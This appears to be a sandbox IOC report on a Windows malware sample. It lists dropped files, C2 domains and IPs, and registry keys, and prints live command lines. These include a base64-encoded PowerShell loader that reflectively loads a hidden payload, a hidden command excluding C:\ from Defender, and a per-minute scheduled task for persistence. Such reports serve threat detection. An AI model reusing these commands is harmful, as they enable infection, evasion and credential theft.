IOC Report
xwREqjHUEv.exe

loading gif

Files

File Path
Type
Category
Malicious
xwREqjHUEv.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\Temp\F324.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\F557.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\D4C0.vmt.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\gfiecjd
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\UndLdl.ps1
Unicode text, UTF-8 (with BOM) text, with very long lines (488), with CRLF line terminators
dropped
malicious
C:\Users\user\start.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\temp.bat
DOS batch file, ASCII text, with very long lines (48166), with CRLF, LF line terminators
dropped
malicious
C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP2810.tmp (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AppLaunch.exe.log
CSV text
modified
C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat
JSON data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\246122658369
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
dropped
C:\Users\user\AppData\Local\Temp\44D.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\78B.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\828.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\9FE.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\CCD.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\EB3.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\Users\user\AppData\Local\Temp\F892.tmp
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\F892.tmp-shm
data
dropped
C:\Users\user\AppData\Local\Temp\FE31.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5033xstw.oxw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5iocqtzl.u2d.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ahwbpeok.evj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cicnnd3j.3ul.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmjghdal.5aa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvjgagjy.2eq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zicirmum.xtg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqtdbrfi.eu1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\ab10c56eed80d1\clip64.dll
HTML document, ASCII text
dropped
C:\Users\user\AppData\Roaming\ab10c56eed80d1\cred64.dll
HTML document, ASCII text
dropped
C:\Users\user\AppData\Roaming\gjguwvr
data
dropped
C:\Users\user\UndLdl.bat
DOS batch file, ASCII text, with very long lines (48166), with CRLF, LF line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 26 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\xwREqjHUEv.exe
"C:\Users\user\Desktop\xwREqjHUEv.exe"
malicious
C:\Windows\SysWOW64\wscript.exe
"wscript.exe" "C:\Users\user\start.vbs"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlVuZExkbC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\user\UndLdl.ps1' -Encoding UTF8"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\UndLdl.ps1"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\System32\OpenWith.exe
"C:\Windows\system32\openwith.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
malicious
C:\Windows\System32\cmd.exe
"cmd.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
malicious
C:\Users\user\AppData\Roaming\D4C0.vmt.exe
"C:\Users\user\AppData\Roaming\D4C0.vmt.exe"
malicious
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
malicious
C:\Users\user\AppData\Roaming\gfiecjd
C:\Users\user\AppData\Roaming\gfiecjd
malicious
C:\Users\user\AppData\Local\Temp\F324.exe
C:\Users\user\AppData\Local\Temp\F324.exe
malicious
C:\Users\user\AppData\Local\Temp\F557.exe
C:\Users\user\AppData\Local\Temp\F557.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe
"C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe"
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe" /F
malicious
C:\Windows\explorer.exe
C:\Windows\explorer.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe
C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\explorer.exe
C:\Windows\explorer.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\explorer.exe
C:\Windows\explorer.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\System32\OpenWith.exe
"C:\Windows\system32\openwith.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 720
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
There are 25 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://atillapro.com/
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://atillapro.com/vsdjcn3khS/Plugins/cred64.dll
185.196.8.137
malicious
atillapro.com/vsdjcn3khS/index.php
malicious
http://atillapro.com/
185.196.8.137
malicious
http://atillapro.com/vsdjcn3khS/index.php?scr=1
185.196.8.137
malicious
http://atillapro.com/vsdjcn3khS/index.php
185.196.8.137
malicious
http://atillapro.com/vsdjcn3khS/Plugins/clip64.dll
185.196.8.137
malicious
http://nuget.org/NuGet.exe
unknown
https://216.250.255.115:80/bed1f869ae125/aqbrhghr.uhmsf
unknown
http://crl.micro
unknown
http://www.microsoft.coK
unknown
https://aka.ms/pscore6lB
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 12 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
atillapro.com
185.196.8.137
malicious
bg.microsoft.map.fastly.net
199.232.214.172

IPs

IP
Domain
Country
Malicious
185.196.8.137
atillapro.com
Switzerland
malicious
216.250.255.115
unknown
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Startup
malicious
HKEY_CURRENT_USER\SOFTWARE\SibCode
sn
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.csv\OpenWithProgids
Excel.CSV
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\OpenWithProgids
Word.Document.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docm\OpenWithProgids
Word.DocumentMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithProgids
Word.Document.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dot\OpenWithProgids
Word.Template.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dotm\OpenWithProgids
Word.TemplateMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dotx\OpenWithProgids
Word.Template.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.msg\OpenWithProgids
Outlook.File.msg.15
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.odp\OpenWithProgids
PowerPoint.OpenDocumentPresentation.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ods\OpenWithProgids
Excel.OpenDocumentSpreadsheet.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.odt\OpenWithProgids
Word.OpenDocumentText.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pot\OpenWithProgids
PowerPoint.Template.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.potm\OpenWithProgids
PowerPoint.TemplateMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.potx\OpenWithProgids
PowerPoint.Template.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppam\OpenWithProgids
PowerPoint.Addin.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppsm\OpenWithProgids
PowerPoint.SlideShowMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppsx\OpenWithProgids
PowerPoint.SlideShow.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppt\OpenWithProgids
PowerPoint.Show.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pptm\OpenWithProgids
PowerPoint.ShowMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pptx\OpenWithProgids
PowerPoint.Show.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rtf\OpenWithProgids
Word.RTF.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sldm\OpenWithProgids
PowerPoint.SlideMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sldx\OpenWithProgids
PowerPoint.Slide.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vsto\OpenWithProgids
bootstrap.vsto.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlam\OpenWithProgids
Excel.AddInMacroEnabled
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xls\OpenWithProgids
Excel.Sheet.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsb\OpenWithProgids
Excel.SheetBinaryMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsm\OpenWithProgids
Excel.SheetMacroEnabled.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsx\OpenWithProgids
Excel.Sheet.12
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlt\OpenWithProgids
Excel.Template.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xltm\OpenWithProgids
Excel.TemplateMacroEnabled
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xltx\OpenWithProgids
Excel.Template
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithProgids
Unpacker
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3g2\OpenWithProgids
WMP11.AssocFile.3G2
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp\OpenWithProgids
WMP11.AssocFile.3GP
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp2\OpenWithProgids
WMP11.AssocFile.3G2
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gpp\OpenWithProgids
WMP11.AssocFile.3GP
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aac\OpenWithProgids
WMP11.AssocFile.ADTS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.adt\OpenWithProgids
WMP11.AssocFile.ADTS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\OpenWithProgids
WMP11.AssocFile.AIFF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asf\OpenWithProgids
WMP11.AssocFile.ASF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asx\OpenWithProgids
WMP11.AssocFile.ASX
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\OpenWithProgids
WMP11.AssocFile.AU
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au3\OpenWithProgids
AutoIt3Script
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.avi\OpenWithProgids
WMP11.AssocFile.AVI
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bmp\OpenWithProgids
Paint.Picture
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cab\OpenWithProgids
CABFolder
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cdxml\OpenWithProgids
Microsoft.PowerShellCmdletDefinitionXML.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.css\OpenWithProgids
CSSfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dds\OpenWithProgids
ddsfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dib\OpenWithProgids
Paint.Picture
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dll\OpenWithProgids
dllfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.emf\OpenWithProgids
emffile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
exefile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\OpenWithProgids
WMP11.AssocFile.FLAC
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.fon\OpenWithProgids
fonfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gif\OpenWithProgids
giffile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithProgids
htmlfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ico\OpenWithProgids
icofile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.inf\OpenWithProgids
inffile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ini\OpenWithProgids
inifile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jfif\OpenWithProgids
pjpegfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpe\OpenWithProgids
jpegfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpeg\OpenWithProgids
jpegfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jxr\OpenWithProgids
wdpfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\OpenWithProgids
lnkfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m1v\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m2t\OpenWithProgids
WMP11.AssocFile.M2TS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m2v\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\OpenWithProgids
WMP11.AssocFile.m3u
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4a\OpenWithProgids
WMP11.AssocFile.M4A
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4v\OpenWithProgids
WMP11.AssocFile.MP4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithProgids
mhtmlfile
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\OpenWithProgids
WMP11.AssocFile.MIDI
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mk3d\OpenWithProgids
WMP11.AssocFile.MK3D
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mka\OpenWithProgids
WMP11.AssocFile.MKA
